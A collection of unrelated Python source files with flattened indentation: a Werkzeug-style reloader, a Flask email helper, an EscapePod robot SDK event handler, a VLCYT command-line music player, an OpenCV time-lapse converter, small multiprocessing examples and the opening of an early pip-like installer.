refresh automatically. (Ripped from https://github.com/mitsuhiko/werkzeug/blob/1a21e27a99331d854cec9174a1fc0fcd9717a673/werkzeug/_reloader.py)
"""
import sys
import os
import subprocess
import time
from itertools import chain
import threading
def _iter_module_files():
"""This iterates over all relevant Python files. It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()):
if module is None:
continue
filename = getattr(module, '__file__', None)
if filename:
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in ('.pyc', '.pyo'):
filename = filename[:-1]
yield filename
class ReloaderLoop(object):
name = None
# monkeypatched by testsuite. wrapping with `staticmethod` is required in
# case time.sleep has been replaced by a non-c function (e.g. by
# `eventlet.monkey_patch`) before we get here
_sleep = staticmethod(time.sleep)
def __init__(self, extra_files=None, interval=1):
self.extra_files = set(os.path.abspath(x)
for x in extra_files or ())
self.interval = interval
def run(self):
pass
def restart_with_reloader(self):
"""Spawn a new Python interpreter with the same arguments as this one,
but running the reloader thread.
"""
while 1:
print(' * Restarting with %s' % self.name)
args = [sys.executable] + sys.argv
new_environ = os.environ.copy()
new_environ['WERKZEUG_RUN_MAIN'] = 'true'
exit_code = subprocess.call(args, env=new_environ,
close_fds=False)
if exit_code != 3:
return exit_code
def trigger_reload(self, filename):
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename):
filename = os.path.abspath(filename)
print(' * Detected change in %r, reloading' % filename)
class StatReloaderLoop(ReloaderLoop):
name = 'stat'
def run(self):
mtimes = {}
while 1:
for filename in chain(_iter_module_files(),
self.extra_files):
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
self.trigger_reload(filename)
self._sleep(self.interval)
def run_with_reloader(main_func, extra_files=None, interval=1,
reloader_type='auto'):
"""Run the given function in an independent python interpreter."""
import signal
reloader = StatReloaderLoop(extra_files, interval)
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
new_environ = os.environ.copy()
new_environ['WERKZEUG_RUN_MAIN'] = 'true'
try:
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
t = threading.Thread(target=main_func, args=())
t.setDaemon(True)
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['WREC_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['WREC_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
events.py
|
# Copyright (c) 2021 cyb3rdog
# Based on Anki Vector Python SDK
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Event handler used to make functions subscribe to escapepod proxy events.
"""
__all__ = ['EventHandler', 'Events']
import asyncio
from google.protobuf.text_format import MessageToString
from concurrent.futures import CancelledError
from enum import Enum
import threading
from typing import Callable
import uuid
from .connection import Connection
from .messaging import protocol
from .messages import keep_alive, subscribed, process_intent
from . import util
class Events(Enum):
"""List of available events."""
# EscapePod Extension Proxy Events
subscribed = "Subscribed" # : Event containing the subscription session guid.
unsubscribed= "UnSubscribed" # : Event triggered when Client unsubscribes from escapepod extension proxy.
keep_alive = "KeepAlive" # : Event triggered when a keep_alive message is sent from escape pod to client
process_intent = "ProcessIntent" # : Event triggered when a vector hears an intent registered on escapepod
class _EventCallback:
def __init__(self, callback, *args, _on_connection_thread: bool = False, **kwargs):
self._extra_args = args
self._extra_kwargs = kwargs
self._callback = callback
self._on_connection_thread = _on_connection_thread
@property
def on_connection_thread(self):
return self._on_connection_thread
@property
def callback(self):
return self._callback
@property
def extra_args(self):
return self._extra_args
@property
def extra_kwargs(self):
return self._extra_kwargs
def __eq__(self, other):
other_cb = other
if hasattr(other, "callback"):
other_cb = other.callback
return other_cb == self.callback
def __hash__(self):
return self._callback.__hash__()
class EventHandler:
"""Listen for EscapePod extension proxy events."""
def __init__(self, client, robot, keep_alive):
self.logger = util.get_class_logger(__name__, self)
self._client = client
self._robot = robot
self._conn = None
self._conn_id = None
self._keepalive = keep_alive
self._subscriber_uuid = None
self.listening_for_events = False
self.event_future = None
self._thread: threading.Thread = None
self._loop: asyncio.BaseEventLoop = None
self.subscribers = {}
self._done_signal: asyncio.Event = None
@property
def subscribed(self) -> bool:
"""A property to determine whether the event stream is subscribed to escapepod extension proxy."""
return not self._subscriber_uuid == None
def start(self, connection: Connection):
"""Start listening for events. Automatically called by the :class:`escapepod_sdk.extension.Client` class.
:param connection: A reference to the connection from the SDK to the escapepod.
:param loop: The loop to run the event task on.
"""
self._conn = connection
self.listening_for_events = True
self._thread = threading.Thread(target=self._run_thread, daemon=True, name="Event Stream Handler Thread")
self._thread.start()
def _run_thread(self):
try:
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._done_signal = asyncio.Event(loop=self._loop)
# create an event stream handler on the connection thread
self.event_future = asyncio.run_coroutine_threadsafe(self._handle_event_stream(), self._conn.loop)
async def wait_until_done():
return await self._done_signal.wait()
self._loop.run_until_complete(wait_until_done())
finally:
self._loop.close()
def close(self):
"""Stop listening for events. Automatically called by the :class:`escapepod_sdk.extension.Client` class."""
self.listening_for_events = False
try:
self._handle_stream_closing()
if self.event_future:
self.event_future.cancel()
self.event_future.result()
except CancelledError:
pass
try:
#self._loop.call_soon_threadsafe(self._done_signal.set)
if self._thread:
self._thread.join(timeout=5)
self._thread = None
except CancelledError:
pass
def _notify(self, event_callback, event_name, event_data):
loop = self._loop
thread = self._thread
# For high priority events that shouldn't be blocked by user callbacks
# they will run directly on the connection thread. This should typically
# be used when setting robot properties from events.
if event_callback.on_connection_thread:
loop = self._conn.loop
thread = self._conn.thread
callback = event_callback.callback
args = event_callback.extra_args
kwargs = event_callback.extra_kwargs
if asyncio.iscoroutinefunction(callback):
callback = callback(self._robot, event_name, event_data, *args, **kwargs)
elif not asyncio.iscoroutine(callback):
async def call_async(fn, *args, **kwargs):
fn(*args, **kwargs)
callback = call_async(callback, self._robot, event_name, event_data, *args, **kwargs)
if threading.current_thread() is thread:
future = asyncio.ensure_future(callback, loop=loop)
else:
future = asyncio.run_coroutine_threadsafe(callback, loop=loop)
future.add_done_callback(self._done_callback)
def _done_callback(self, completed_future):
exc = completed_future.exception()
if exc:
self.logger.error("Event callback exception: %s", exc)
if isinstance(exc, TypeError) and "positional arguments but" in str(exc):
self.logger.error("The subscribed function may be missing parameters in its definition. Make sure it has robot, event_type and event positional parameters.")
async def dispatch_event_by_name(self, event_data, event_name: str):
"""Dispatches event to event listeners by name.
.. testcode::
import escapepod_sdk
def event_listener(none, name, msg):
print(name) # will print 'my_custom_event'
print(msg) # will print 'my_custom_event dispatched'
with escapepod_sdk.extension.Client() as client:
client.events.subscribe_by_name(event_listener, event_name='my_custom_event')
client.conn.run_coroutine(client.events.dispatch_event_by_name('my_custom_event dispatched', event_name='my_custom_event'))
:param event_data: Data to accompany the event.
:param event_name: The name of the event that will result in func being called.
"""
if not event_name:
self.logger.error('Bad event_name in dispatch_event.')
if event_name in self.subscribers.keys():
subscribers = self.subscribers[event_name].copy()
for callback in subscribers:
self._notify(callback, event_name, event_data)
async def dispatch_event(self, event_data, event_type: Events):
"""Dispatches event to event listeners."""
if not event_type:
self.logger.error('Bad event_type in dispatch_event.')
event_name = event_type.value
await self.dispatch_event_by_name(event_data, event_name)
def _unpack_event(self, response):
event_name = protocol.MessageType.Name(response.message_type)
event_data = response.message_data
if event_name == 'KeepAlive':
event_data = keep_alive(response)
if event_name == "ProcessIntent":
event_data = process_intent(response)
return event_name, event_data
async def _handle_event_stream(self):
self._conn_id = bytes(uuid.uuid4().hex, "utf-8")
try:
req = protocol.SubscribeRequest(keep_alive=self._keepalive)
async for response in self._conn.grpc_interface.Subscribe(req):
if not self.listening_for_events:
break
try:
self.logger.debug(f"ProxyMessage {MessageToString(response, as_one_line=True)}")
if response.message_type == protocol.Subscribed:
self._subscriber_uuid = subscribed(response).uuid
self.logger.info("Successfully subscribed to Cyb3rVector EscapePod Extension event stream")
elif response.message_type == protocol.Unsubscribed:
self._subscriber_uuid = None
self.logger.info(f"Successfully unsubscribed from Cyb3rVector EscapePod extension event stream")
event_name, event_data = self._unpack_event(response)
await self.dispatch_event_by_name(event_data, event_name)
except TypeError:
self.logger.warning('Unknown Event type')
except CancelledError:
self.logger.info('Disconnecting from Cyb3rVector EscapePod Extension event stream.')
except Exception as e:
print(e)
def _handle_stream_closing(self):
if self.subscribed:
request = protocol.UnsubscribeRequest(uuid=self._subscriber_uuid)
self._conn.run_coroutine(self._conn.grpc_interface.UnSubscribe(request))
self._subscriber_uuid = None
def subscribe_by_name(self, func: Callable, event_name: str, *args, **kwargs):
"""Receive a method call when the specified event occurs.
.. testcode::
import escapepod_sdk
def event_listener(none, name, msg):
print(name) # will print 'my_custom_event'
print(msg) # will print 'my_custom_event dispatched'
with escapepod_sdk.extension.Client() as client:
client.events.subscribe_by_name(event_listener, event_name='my_custom_event')
client.conn.run_coroutine(client.events.dispatch_event_by_name('my_custom_event dispatched', event_name='my_custom_event'))
:param func: A method implemented in your code that will be called when the event is fired.
:param event_name: The name of the event that will result in func being called.
:param args: Additional positional arguments to this function will be passed through to the callback in the provided order.
:param kwargs: Additional keyword arguments to this function will be passed through to the callback.
"""
if not event_name:
self.logger.error('Bad event_name in subscribe.')
if event_name not in self.subscribers.keys():
self.subscribers[event_name] = set()
self.subscribers[event_name].add(_EventCallback(func, *args, **kwargs))
def subscribe(self, func: Callable, event_type: Events, *args, **kwargs):
"""Receive a method call when the specified event occurs.
:param func: A method implemented in your code that will be called when the event is fired.
:param event_type: The enum type of the event that will result in func being called.
:param args: Additional positional arguments to this function will be passed through to the callback in the provided order.
:param kwargs: Additional keyword arguments to this function will be passed through to the callback.
"""
if not event_type:
self.logger.error('Bad event_type in subscribe.')
event_name = event_type.value
self.subscribe_by_name(func, event_name, *args, **kwargs)
def unsubscribe_by_name(self, func: Callable, event_name: str):
"""Unregister a previously subscribed method from an event.
.. testcode::
import escapepod_sdk
def event_listener(none, name, msg):
print(name) # will print 'my_custom_event'
print(msg) # will print 'my_custom_event dispatched'
with escapepod_sdk.extension.Client() as client:
client.events.subscribe_by_name(event_listener, event_name='my_custom_event')
client.conn.run_coroutine(client.events.dispatch_event_by_name('my_custom_event dispatched', event_name='my_custom_event'))
:param func: The method you no longer wish to be called when an event fires.
:param event_name: The name of the event for which you no longer want to receive a method call.
"""
if not event_name:
self.logger.error('Bad event_key in unsubscribe.')
if event_name in self.subscribers.keys():
event_subscribers = self.subscribers[event_name]
if func in event_subscribers:
event_subscribers.remove(func)
if not event_subscribers:
self.subscribers.pop(event_name, None)
else:
self.logger.error(f"The function '{func.__name__}' is not subscribed to '{event_name}'")
else:
self.logger.error(f"Cannot unsubscribe from event_type '{event_name}'. "
"It has no subscribers.")
def unsubscribe(self, func: Callable, event_type: Events):
"""Unregister a previously subscribed method from an event.
:param func: The enum type of the event you no longer wish to be called when an event fires.
:param event_type: The name of the event for which you no longer want to receive a method call.
"""
if not event_type:
self.logger.error('Bad event_type in unsubscribe.')
event_name = event_type.value
self.unsubscribe_by_name(func, event_name)
|
command_handler.py
|
import threading
import pyperclip
from colorama import Fore
from vlcyt.lyrics_scraper import get_lyrics
class CommandHandler:
"""
Handles user input for VLCYT
"""
_help_commands = ["?", "help"]
_volume_commands = ["volume", "v"]
_skip_commands = ["skip", "s", "next", "n", "forward", "f"]
_play_commands = ["play", "pause", "p"]
_repeat_commands = ["repeat", "replay", "r"]
_back_commands = ["back", "b"]
_loop_commands = ["loop", "l"]
_shuffle_commands = ["shuffle"]
_copy_url_commands = ["copy", "c", "url"]
_lyrics_commands = ["lyrics"]
_exit_commands = ["exit", "quit", "q", "x"]
def __init__(self, vlcyt):
self.vlcyt = vlcyt
self.input_thread = threading.Thread(target=self._get_input)
self.input_thread.daemon = True
self.skip_song = False # Becomes True if the user enters the skip command
self.exit_program = False # Becomes True if the user enters the exit command
self.loop_song = False # Becomes True if the user enters the loop command
self.shuffle_playlist = False # Becomes True if the user enters the shuffle command
self.back_song = False # Becomes True if the user enters the back command
self.back_amount = 1 # Stores how many indexes back will be popped from song_history to get songs in history
def _get_input(self):
"""
Gathers user input from the input thread and executes commands.
"""
while True:
command_name, command_value = self._get_command()
if command_name in self._help_commands:
self.command_help()
elif command_name in self._volume_commands:
self.command_set_volume(command_value)
elif command_name in self._skip_commands:
self.command_skip_song(command_value)
elif command_name in self._play_commands:
self.command_p()
elif command_name in self._repeat_commands:
self.command_repeat()
elif command_name in self._back_commands:
self.command_back()
elif command_name in self._loop_commands:
self.command_loop()
elif command_name in self._shuffle_commands:
self.command_shuffle()
elif command_name in self._copy_url_commands:
self.command_copy_url()
elif command_name in self._lyrics_commands:
self.command_lyrics()
elif command_name in self._exit_commands:
self.exit_program = True
else:
print(f"{Fore.RED}Invalid command{Fore.RESET}")
def _get_command(self):
"""
Processes a command from the user.
Output: tuple: command name string, command value string
"""
command = ""
while command == "":
command = input(self.vlcyt.command_string).lower()
split_command = command.split()
try:
command_name = split_command[0]
command_value = split_command[1]
except IndexError:
command_value = None
return command_name, command_value
def input_features_enabled(self):
"""
Returns True if loop, shuffle, back, or skip are enabled.
"""
input_features = [
self.loop_song,
self.shuffle_playlist,
self.back_song,
self.skip_song,
]
return True in input_features
def command_help(self):
print(
f"""{Fore.MAGENTA}======================================
{Fore.YELLOW}NOTE: Most commands have multiple aliases separated by commas, use whichever you prefer.
{Fore.CYAN}VLCYT Commands:
{Fore.GREEN}?, help{Fore.WHITE}
Opens this help menu and shows whether or not looping and shuffling are enabled.
{Fore.GREEN}volume, v{Fore.WHITE}
Adjust the volume (0 - 100).
{Fore.GREEN}skip, s, next, n, forward, f{Fore.WHITE}
Skips song(s).
For example: Entering "skip" will skip one song,
entering "skip 5" will skip 5 songs.
{Fore.GREEN}play, pause, p{Fore.WHITE}
Plays/Pauses the current song.
{Fore.GREEN}repeat, replay, r{Fore.WHITE}
Repeats the current song one time.
{Fore.GREEN}back, b{Fore.WHITE}
Skips to the last song played.
{Fore.GREEN}loop, l{Fore.WHITE}
Enables looping.
The current song will keep playing until looping is disabled.
{Fore.GREEN}shuffle{Fore.WHITE}
Shuffles the playlist without repeating until every song has been played.
{Fore.GREEN}copy, c, url{Fore.WHITE}
Copies the current song's YouTube URL.
{Fore.GREEN}lyrics
{Fore.YELLOW}EXPERIMENTAL:{Fore.WHITE} Attempts to retrieve the current song's lyrics.
Needs to be improved.
{Fore.GREEN}exit, quit, q, x{Fore.WHITE}
Closes the program.
{Fore.MAGENTA}======================================
{Fore.CYAN}---Settings---{Fore.RESET}
{Fore.GREEN}Looping:{Fore.RESET} {f"{Fore.GREEN}Enabled{Fore.RESET}" if self.loop_song else f"{Fore.RED}Disabled{Fore.RESET}"}
{Fore.GREEN}Shuffling:{Fore.RESET} {f"{Fore.GREEN}Enabled{Fore.RESET}" if self.shuffle_playlist else f"{Fore.RED}Disabled{Fore.RESET}"}
{Fore.CYAN}--------------{Fore.RESET}"""
)
def command_set_volume(self, volume):
"""
Sets VLC volume.
"""
if not volume:
print(
f"Volume: {Fore.GREEN}{self.vlcyt.vlc_player.audio_get_volume()}{Fore.RESET}"
)
return
try:
volume = int(volume)
except (TypeError, ValueError):
print(f"{Fore.RED}Bad input.{Fore.RESET} Enter an integer from 0 - 100.")
return
if 0 <= volume <= 100:
self.vlcyt.vlc_player.audio_set_volume(volume)
print(f"Volume set to {Fore.GREEN}{volume}{Fore.RESET}")
else:
print(f"{Fore.RED}Volume out of range.{Fore.RESET} Range: 0 - 100")
def command_skip_song(self, amount_to_skip):
"""
Skips the current song.
Round robins if it causes the song counter to go over the total amount of songs in the playlist.
"""
if amount_to_skip is not None:
try:
amount_to_skip = int(amount_to_skip)
except (TypeError, ValueError):
print(f"{Fore.RED}Bad input.{Fore.RESET} Enter a number.")
return
if amount_to_skip in [1, None]:
self.vlcyt.song_index = (
self.vlcyt.song_index + 1
if self.vlcyt.song_index < self.vlcyt.total_songs
else 0
)
self.skip_song = True
elif amount_to_skip > 1:
potential_index = self.vlcyt.song_index + amount_to_skip
if potential_index <= self.vlcyt.total_songs:
self.vlcyt.song_index += amount_to_skip - 1
else: # Round robin
total_multiplier = potential_index // self.vlcyt.total_songs
self.vlcyt.song_index = (
potential_index - 1 - self.vlcyt.total_songs * total_multiplier
)
self.skip_song = True
else:
print(f"{Fore.RED}Bad input.{Fore.RESET} Enter a value greater than 0.")
def command_repeat(self):
"""
Repeats the current song.
"""
self.vlcyt.vlc_player.set_time(0)
def command_p(self):
"""
Plays/Pauses the current song.
"""
self.vlcyt.vlc_player.pause()
def command_back(self):
"""
Play last song in history.
"""
if self.vlcyt.song_history and self.vlcyt.song_index != 0:
self.back_song = True
self.skip_song = True
else:
print(f"{Fore.RED}No songs in history{Fore.RESET}")
def command_loop(self):
"""
Enables/Disables looping the current song.
"""
if self.loop_song == False:
self.loop_song = True
print(f"Looping {Fore.GREEN}enabled.{Fore.RESET}")
else:
self.loop_song = False
print(f"Looping {Fore.RED}disabled.{Fore.RESET}")
def command_shuffle(self):
if self.shuffle_playlist == False:
self.shuffle_playlist = True
print(f"Shuffle {Fore.GREEN}enabled.{Fore.RESET}")
else:
self.shuffle_playlist = False
print(f"Shuffle {Fore.RED}disabled.{Fore.RESET}")
def command_copy_url(self):
pyperclip.copy(
"https://www.youtube.com/watch?v=" + self.vlcyt.current_song.videoid
)
print(f"{Fore.GREEN}Song URL Copied")
def command_lyrics(self):
print(
f"{Fore.MAGENTA}======================================{Fore.RESET}", end=""
)
try:
print(get_lyrics(self.vlcyt._clean_title()))
except (AttributeError, IndexError) as e:
print(f"\n{Fore.RED}Failed to retrieve song lyrics :({Fore.RESET}")
print(f"{Fore.MAGENTA}======================================{Fore.RESET}")
|
025_convert_video_to_time-lapse.py
|
import pathlib
import queue
import threading
import cv2
import json
# グローバル変数を示す
INPUT_FILE = ""
TIME_LAPSE_FRAME_RATE = 0
OUTPUT_FRAME_RATE = 0
OUTPUT_WIDTH = 0
OUTPUT_HEIGHT = 0
DISPLAY_STRING = ""
def convert_time(ct_time):
"""Convert seconds to hours, minutes, and seconds.
Args:
ct_time (int/float):Seconds to be converted.
Returns:
string: Hours, minutes, seconds converted from seconds.
"""
ct_hour = int(ct_time / 3600)
ct_minute = int((ct_time - ct_hour * 3600) / 60)
ct_second = int(ct_time - ct_hour * 3600 - ct_minute * 60)
return f"{ct_hour:02}h{ct_minute:02}m{ct_second:02}sec"
def read_frame(target_paths, frame_queue):
"""Extract a specific video frame from the videos indicated by the paths.
Args:
target_paths (list): Input video including path
frame_queue (instance): a FIFO queue
"""
# タイムラプスで示す経過時間
total_frame_index = 0
# ファイルの読み込み
for path in target_paths:
# フレームレートの取得
capture = cv2.VideoCapture(str(path))
# ファイルの有無確認
if not capture.isOpened():
return
# 入力ファイルのfpsを取得
frame_fps = capture.get(cv2.CAP_PROP_FPS)
# 個々のビデオの経過時間
frame_index = 0
while True:
result, frame = capture.read()
# リードの可否確認
if not result:
break
if frame_index % TIME_LAPSE_FRAME_RATE == 0:
# 進捗の表示
print(f"[read] {path}:{convert_time(frame_index/frame_fps)}")
# キューに画像データを渡す
frame_queue.put([total_frame_index, frame_fps, frame])
frame_index += 1
total_frame_index += 1
capture.release()
# すべてが終了したらキューにNoneを送り終了させる
frame_queue.put([total_frame_index, frame_fps, None])
def write_frame(frame_queue):
"""Output a video of a new size by adding time and text to the input frame.
Args:
frame_queue (list): total_frame_index, frame_fps, frame
"""
# VideoWriterオブジェクトを作成
# 出力はout.mp4
# リサイズと整合を合わせること
video_writer = cv2.VideoWriter("out.mp4",
cv2.VideoWriter_fourcc("m", "p", "4", "v"),
OUTPUT_FRAME_RATE,
(OUTPUT_WIDTH, OUTPUT_HEIGHT))
while True:
# キューからデータを取得する
total_frame_index, frame_fps, frame = frame_queue.get()
try:
# キューにデータが無い場合は終了
if frame is None:
break
else:
# リサイズ
frame_resize = cv2.resize(frame, dsize=(OUTPUT_WIDTH, OUTPUT_HEIGHT))
# 文字入力
cv2.putText(frame_resize,
# 出力する文字列
convert_time(total_frame_index / frame_fps) + DISPLAY_STRING,
# 表示位置、文字列の右下
(0, 50),
# フォントの種類
cv2.FONT_HERSHEY_PLAIN,
# 文字のスケール
3.0,
# 文字の色(青, 緑, 赤)
(255, 255, 255),
# 文字の選の太さ
5,
# 文字を描画するアルゴリズム
cv2.LINE_AA)
video_writer.write(frame_resize)
finally:
# キューにタスク完了を示す
frame_queue.task_done()
video_writer.release()
def main():
# jsonファイルの設定ファイル読み込み
global INPUT_FILE
global TIME_LAPSE_FRAME_RATE
global OUTPUT_FRAME_RATE
global OUTPUT_WIDTH
global OUTPUT_HEIGHT
global DISPLAY_STRING
setting = json.load(open("setting.json", "r", encoding="utf-8"))
INPUT_FILE = setting["SEARCH_FILE"]["NAME"]
TIME_LAPSE_FRAME_RATE = setting["INPUT_FILE"]["TIME_LAPSE_SPEED"]
OUTPUT_FRAME_RATE = setting["OUTPUT_FILE"]["FRAME_RATE"]
OUTPUT_WIDTH = setting["OUTPUT_FILE"]["OUTPUT_WIDTH"]
OUTPUT_HEIGHT = setting["OUTPUT_FILE"]["OUTPUT_HEIGHT"]
DISPLAY_STRING = setting["DISPLAY"]["STRING"]
# ファイル取得
# カレントディレクトリを示す
target_dir = pathlib.Path(".")
# MTSファイルを取得、ソートする
target_paths = sorted(target_dir.glob(INPUT_FILE))
if target_paths:
# キューの設定
frame_queue = queue.Queue(maxsize=10)
# スレッド処理の設定
# 但し並列処理と変わらない??
read_frame_worker = threading.Thread(
target=read_frame,
daemon=True,
kwargs={"target_paths": target_paths, "frame_queue": frame_queue},)
read_frame_worker.start()
write_frame_worker = threading.Thread(
target=write_frame, daemon=True, kwargs={"frame_queue": frame_queue},)
write_frame_worker.start()
# キューの処理が終わるまでブロックする
read_frame_worker.join()
write_frame_worker.join()
else:
print(f"There is no videos named {INPUT_FILE}.")
if __name__ == "__main__":
main()
|
test.py
|
from multiprocessing import Process,Queue
import os
import time
q = Queue()
def _write(q):
print('Process(%s) is writing...' % os.getpid())
while 1:
time.sleep(2)
url = 100
q.put(url)
print('Put %s to queue...' % url)
if __name__ == "__main__":
p = Process(target=_write,args=(q,))
p.start()
p.join()
https://www.cnblogs.com/itogo/p/5635629.html
|
primes.py
|
import multiprocessing
from itertools import count
PRIMES_PER_PROCESS = 16
def check_divisbility(primes, number):
return all(number % x for x in primes)
def checker(primes, in_potentials, out_primes, out_potentials):
maximum = primes[-1] ** 2
while True:
potential = in_potentials.get()
if potential == "stop":
out_potentials.put("stop")
return
if check_divisbility(primes, potential):
if potential < maximum:
out_primes.put(potential)
else:
out_potentials.put(potential)
def printer(in_primes):
while True:
num = in_primes.get()
if num == "stop":
return
print("Prime:", num)
def main():
integers = count(2)
initial_primes = []
while len(initial_primes) < multiprocessing.cpu_count() * PRIMES_PER_PROCESS:
num = next(integers)
if check_divisbility(initial_primes, num):
initial_primes.append(num)
primes = multiprocessing.Queue()
for p in initial_primes:
primes.put(p)
source = top = multiprocessing.Queue()
print_process = multiprocessing.Process(target=printer, args=(primes,))
print_process.start()
processes = []
for i in range(0, len(initial_primes), PRIMES_PER_PROCESS):
potentials = multiprocessing.Queue()
proc = multiprocessing.Process(
target=checker,
args=(
initial_primes[i : i + PRIMES_PER_PROCESS],
source,
primes,
potentials,
),
)
proc.start()
processes.append(proc)
source = potentials
for i in range(initial_primes[-1] + 1, initial_primes[-1] ** 2):
top.put(i)
top.put("stop")
for proc in processes:
proc.join()
primes.put("stop")
print_process.join()
if __name__ == "__main__":
main()
|
pyinstall.py
|
#!C:\Users\sinsu\PycharmProjects\pythonProject1\venv\Scripts\python.exe
import sys
import os
import optparse
import pkg_resources
import urllib2
import urllib
import mimetypes
import zipfile
import tarfile
import tempfile
import subprocess
import posixpath
import re
import shutil
try:
from hashlib import md5
except ImportError:
import md5 as md5_module
md5 = md5_module.new
import urlparse
from email.FeedParser import FeedParser
import traceback
from cStringIO import StringIO
import socket
from Queue import Queue
from Queue import Empty as QueueEmpty
import threading
import httplib
import time
import logging
class InstallationError(Exception):
"""General exception during installation"""
class DistributionNotFound(InstallationError):
"""Raised when a distribution cannot be found to satisfy a requirement"""
if getattr(sys, 'real_prefix', None):
## FIXME: is build/ a good name?
base_prefix = os.path.join(sys.prefix, 'build')
base_src_prefix = os.path.join(sys.prefix, 'src')
else:
## FIXME: this isn't a very good default
base_prefix = os.path.join(os.getcwd(), 'build')
base_src_prefix = os.path.join(os.getcwd(), 'src')
pypi_url = "http://pypi.python.org/simple"
default_timeout = 15
parser = optparse.OptionParser(
usage='%prog [OPTIONS] PACKAGE_NAMES')
parser.add_option(
'-e', '--editable',
dest='editables',
action='append',
default=[],
metavar='svn+REPOS_URL[@REV]#egg=PACKAGE',
help='Install a package directly from a checkout. Source will be checked '
'out into src/PACKAGE (lower-case) and installed in-place (using '
'setup.py develop). This option may be provided multiple times.')
parser.add_option(
'-r', '--requirement',
dest='requirements',
action='append',
default=[],
metavar='FILENAME',
help='Install all the packages listed in the given requirements file. '
'This option can be used multiple times.')
parser.add_option(
'-f', '--find-links',
dest='find_links',
action='append',
default=[],
metavar='URL',
help='URL to look for packages at')
parser.add_option(
'-i', '--index-url',
dest='index_url',
metavar='URL',
default=pypi_url,
help='base URL of Python Package Index')
parser.add_option(
'--extra-index-url',
dest='extra_index_urls',
metavar='URL',
action='append',
default=[],
help='extra URLs of package indexes to use in addition to --index-url')
parser.add_option(
'-b', '--build', '--build-dir', '--build-directory',
dest='build_dir',
metavar='DIR',
default=None,
help='Unpack packages into DIR (default %s) and build from there' % base_prefix)
parser.add_option(
'--src', '--source',
dest='src_dir',
metavar='DIR',
default=None,
help='Check out --editable packages into DIR (default %s)' % base_src_prefix)
parser.add_option(
'--timeout',
metavar='SECONDS',
dest='timeout',
type='float',
default=default_timeout,
help='Set the socket timeout (default %s seconds)' % default_timeout)
parser.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all packages to the newest available version')
parser.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages (reinstalling instead)')
parser.add_option(
'--no-install',
dest='no_install',
action='store_true',
help="Download and unpack all packages, but don't actually install them")
parser.add_option(
'--bundle',
dest='bundle',
metavar='BUNDLE_FILE',
help="Collect all packages and create a .pybundle file.")
parser.add_option(
'--freeze',
dest='freeze',
metavar='FREEZE_FILE',
help="Create a file that can be used with --requirement to reproduce the "
"installed packages. You can also give one --requirement file that will "
"be used as the basis of the new file.")
parser.add_option(
'-E', '--environment',
dest='venv',
metavar='DIR',
help='virtualenv environment to run pyinstall in (either give the '
'interpreter or the environment base directory)')
parser.add_option(
'-v', '--verbose',
dest='verbose',
action='count',
default=0,
help='Give more output')
parser.add_option(
'-q', '--quiet',
dest='quiet',
action='count',
default=0,
help='Give less output')
parser.add_option(
'--log',
dest='log',
metavar='FILENAME',
help='Log file where a complete (maximum verbosity) record will be kept')
parser.add_option(
'--proxy',
dest='proxy',
type='str',
default='',
help="Specify a proxy in the form user:passwd@proxy.server:port. "
"Note that the user:password@ is optional and required only if you "
"are behind an authenticated proxy. If you provide "
"user@proxy.server:port then you will be prompted for a password."
)
parser.add_option(
'--install-option',
dest='install_options',
action='append',
help="Extra arguments to be supplied to the setup.py install "
"command (use like --install-option=\"--install-scripts=/usr/local/bin\"). "
"Use multiple --install-option options to pass multiple options to setup.py install"
)
def get_proxy(proxystr=''):
"""Get the proxy given the option passed on the command line. If an
empty string is passed it looks at the HTTP_PROXY environment
variable."""
if not proxystr:
proxystr = os.environ.get('HTTP_PROXY', '')
if proxystr:
if '@' in proxystr:
user_password, server_port = proxystr.split('@', 1)
if ':' in user_password:
user, password = user_password.split(':', 1)
else:
user = user_password
import getpass
prompt = 'Password for %s@%s: ' % (user, server_port)
password = urllib.quote(getpass.getpass(prompt))
return '%s:%s@%s' % (user, password, server_port)
else:
return proxystr
else:
return None
def setup_proxy_handler(proxystr=''):
"""Set the proxy handler given the option passed on the command
line. If an empty string is passed it looks at the HTTP_PROXY
environment variable. """
proxy = get_proxy(proxystr)
if proxy:
proxy_support = urllib2.ProxyHandler({"http": proxy, "ftp": proxy})
opener = urllib2.build_opener(proxy_support, urllib2.CacheFTPHandler)
urllib2.install_opener(opener)
def main(initial_args=None):
global logger
if initial_args is None:
initial_args = sys.argv[1:]
options, args = parser.parse_args(initial_args)
if args and args[-1] == '___VENV_RESTART___':
## FIXME: We don't do anything this this value yet:
venv_location = args[-2]
args = args[:-2]
options.venv = None
level = 1 # Notify
level += options.verbose
level -= options.quiet
level = Logger.level_for_integer(4-level)
complete_log = []
logger = Logger([(level, sys.stdout),
(Logger.DEBUG, complete_log.append)])
if options.venv:
if options.verbose > 0:
# The logger isn't setup yet
print 'Running in environment %s' % options.venv
restart_in_venv(options.venv, initial_args)
